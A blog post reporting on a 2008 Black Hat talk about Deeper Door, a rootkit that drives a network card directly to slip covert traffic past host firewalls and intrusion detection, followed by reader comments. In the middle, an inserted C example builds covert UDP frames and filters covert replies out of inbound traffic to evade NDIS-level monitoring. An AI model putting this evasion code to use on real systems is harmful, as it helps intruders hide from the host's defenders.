Black Hat 2008: NIC based rootkit


While Black Hat and Defcon have both concluded, we're going to post a few more talks that we think deserve attention. [Sherri Sparks] and [Shawn Embleton] from Clear Hat presented Deeper Door, a rootkit that drives the NIC chipset directly. Windows machines use NDIS, the Network Driver Interface Specification, to communicate between the OS and the actual NIC. NDIS is an API that lets programmers talk to network hardware in a general fashion, and because every packet passes through it, most host firewalls and intrusion detection systems monitor traffic at the NDIS level. The team took a novel approach to bypassing that monitoring by talking to the network card directly, below the NDIS level, so the covert traffic never passes through the layer those tools hook.

The team targeted the Intel 8255x chipset because of its open documentation and the availability of compatible cards like the Intel PRO/100B. They found that sending data was very easy: write the frame carrying your UDP packet into a transmit buffer at a memory address the card reads from, check that the card is idle, and then tell it to send. The receive side was slightly more difficult, because you have to intercept all inbound traffic and filter the replies you want out of the legitimate packets. Even though they were writing low level, chipset specific code, they said it was much easier to implement than writing an NDIS driver. While certainly a clever way to implement a covert channel, it only bypasses an IDS or firewall on the same host: the packets still cross the wire unchanged, so a network-based sensor sees them like any other traffic.
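To make the send and receive sides concrete, here is an added example (not code from the Deeper Door talk or its authors): the raw Ethernet/IPv4/UDP frame a NIC-level sender would write into the card's transmit buffer, and the receive-side filter that picks the covert replies out of legitimate traffic before the rest is handed up to the normal stack. The covert UDP port and the 4-byte marker are assumptions made for illustration, as are the sample MAC and IP addresses; the part that actually programs the 8255x (command blocks, the idle check, the start command) is hardware specific and is left out.

```c
/* Added example, not code from the Deeper Door talk: frame construction for the
 * send side and the reply filter for the receive side of a NIC-level covert
 * channel. COVERT_PORT, COVERT_MAGIC and the addresses in selftest() are assumed
 * values; programming the 8255x itself is omitted. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ETH_HLEN  14
#define IP_HLEN   20
#define UDP_HLEN  8
#define MAGIC_LEN 4
#define COVERT_PORT 31337                                               /* assumed */
static const uint8_t COVERT_MAGIC[MAGIC_LEN] = { 0xDE, 0xAD, 0xC0, 0xDE }; /* assumed */

/* RFC 1071 one's-complement sum; yields 0 over a header whose checksum field is correct. */
uint16_t ip_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)((data[i] << 8) | data[i + 1]);
    if (len & 1)
        sum += (uint32_t)data[len - 1] << 8;
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Sender: lay out Ethernet + IPv4 + UDP + marker + payload in buf, byte for byte as it
 * would go into the card's transmit buffer. Returns the frame length, or 0 on error. */
size_t build_covert_frame(uint8_t *buf, size_t cap,
                          const uint8_t dst_mac[6], const uint8_t src_mac[6],
                          uint32_t src_ip, uint32_t dst_ip,
                          const uint8_t *payload, size_t plen)
{
    size_t udp_len = UDP_HLEN + MAGIC_LEN + plen;
    size_t ip_len  = IP_HLEN + udp_len;
    size_t total   = ETH_HLEN + ip_len;
    uint8_t *ip, *udp;

    if (total > cap || ip_len > 0xFFFF)
        return 0;
    memcpy(buf, dst_mac, 6);
    memcpy(buf + 6, src_mac, 6);
    put16(buf + 12, 0x0800);                        /* EtherType IPv4 */
    ip = buf + ETH_HLEN;
    memset(ip, 0, IP_HLEN);
    ip[0] = 0x45;                                   /* version 4, IHL 5 words */
    put16(ip + 2, (uint16_t)ip_len);
    ip[8] = 64;                                     /* TTL */
    ip[9] = 17;                                     /* protocol UDP */
    put32(ip + 12, src_ip);
    put32(ip + 16, dst_ip);
    put16(ip + 10, ip_checksum(ip, IP_HLEN));       /* computed with the field zeroed */
    udp = ip + IP_HLEN;
    put16(udp, COVERT_PORT);                        /* source port */
    put16(udp + 2, COVERT_PORT);                    /* destination port */
    put16(udp + 4, (uint16_t)udp_len);
    put16(udp + 6, 0);                              /* UDP checksum is optional over IPv4 */
    memcpy(udp + UDP_HLEN, COVERT_MAGIC, MAGIC_LEN);
    memcpy(udp + UDP_HLEN + MAGIC_LEN, payload, plen);
    return total;
}

/* Receiver: inspect one inbound frame. Returns 1 and points at the payload when it is a
 * covert reply to be consumed here, 0 when it is legitimate traffic to hand up unchanged. */
int filter_covert_frame(const uint8_t *frame, size_t len,
                        const uint8_t **payload, size_t *plen)
{
    const uint8_t *ip, *udp;
    size_t ihl, ip_len, udp_len;

    if (len < ETH_HLEN + IP_HLEN || get16(frame + 12) != 0x0800)
        return 0;
    ip  = frame + ETH_HLEN;
    ihl = (size_t)(ip[0] & 0x0F) * 4;
    if ((ip[0] >> 4) != 4 || ihl < IP_HLEN || ihl > len - ETH_HLEN || ip[9] != 17)
        return 0;
    if (ip_checksum(ip, ihl) != 0)                  /* damaged header: never ours */
        return 0;
    ip_len = get16(ip + 2);
    if (ip_len > len - ETH_HLEN || ip_len < ihl + UDP_HLEN + MAGIC_LEN)
        return 0;
    udp     = ip + ihl;
    udp_len = get16(udp + 4);
    if (get16(udp + 2) != COVERT_PORT || udp_len < UDP_HLEN + MAGIC_LEN ||
        udp_len > ip_len - ihl || memcmp(udp + UDP_HLEN, COVERT_MAGIC, MAGIC_LEN) != 0)
        return 0;
    *payload = udp + UDP_HLEN + MAGIC_LEN;
    *plen    = udp_len - UDP_HLEN - MAGIC_LEN;
    return 1;
}

/* Round trip on constructed data: the covert frame is diverted, the same frame
 * retargeted at DNS port 53 is treated as ordinary traffic. Returns 1 on success. */
int selftest(void)
{
    static const uint8_t mac_a[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 };   /* constructed */
    static const uint8_t mac_b[6] = { 0x66, 0x77, 0x88, 0x99, 0xAA, 0xBB };   /* constructed */
    uint8_t frame[256];
    const uint8_t *p;
    size_t n;
    size_t len = build_covert_frame(frame, sizeof frame, mac_a, mac_b,
                                    0xC0A80001u, 0xC0A80002u, (const uint8_t *)"ping", 4);
    if (len == 0 || !filter_covert_frame(frame, len, &p, &n) || n != 4 || memcmp(p, "ping", 4) != 0)
        return 0;
    put16(frame + ETH_HLEN + IP_HLEN + 2, 53);      /* now a DNS query: must pass through */
    return filter_covert_frame(frame, len, &p, &n) == 0;
}

int main(void)
{
    printf("selftest: %s\n", selftest() ? "ok" : "FAILED");
    return selftest() ? 0 : 1;
}
```

The filter validates the IPv4 header checksum and every length field before it trusts the port and marker, which matters on the receive path: the code sits below the OS stack and sees every frame the card accepts, including malformed ones, so a sloppy parser there is a kernel-mode crash waiting to happen. Everything that fails the checks is passed up untouched, which is what keeps the legitimate traffic, and the host firewall watching it at NDIS, looking normal.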

[photo: Big Fat Rat]

Comments

  1. Eric says:

    … just another supporting reason for the physical security of your infrastructure!

  2. Comm_Hawk says:

    Not a hack. If someone is soldering things to my network card….

    Now if they could remotely rewrite the ROM (joke intended), that's a hack!

  3. Cypress says:

    This is not a hack. It’s just direct hardware access. You’re simply skirting the system. I’d also consider this obvious.

    Tapping an Ethernet cable and injecting/sniffing data in transit is also not hacking; it's just like anything else.

  4. stealthed-port says:

    This is not a hack. Changing the MAC address on the fly is more practical.

  7. TJHooker says:

    Were they tapping hardware or writing drivers?

  8. Casey Banner says:

    Where does it say they required physical access?

    They are writing drivers, which are run on the PC... all this can be done remotely.

  9. TJHooker says:

    @Casey Banner: ^^

  10. supernova_hq says:

    I just find it amusing that they said it was easier to code directly for the hardware than to use the API Microsoft probably spent hundreds of thousands of dollars to develop.

  11. wat. says:

    “Not a hack”?

    This is one of the most important parts once you are post-root (meaning you have root by physical access or SSH etc.). Having a rootkit on a machine is insurance that you will not get noticed. It doesn't matter how you get one on.
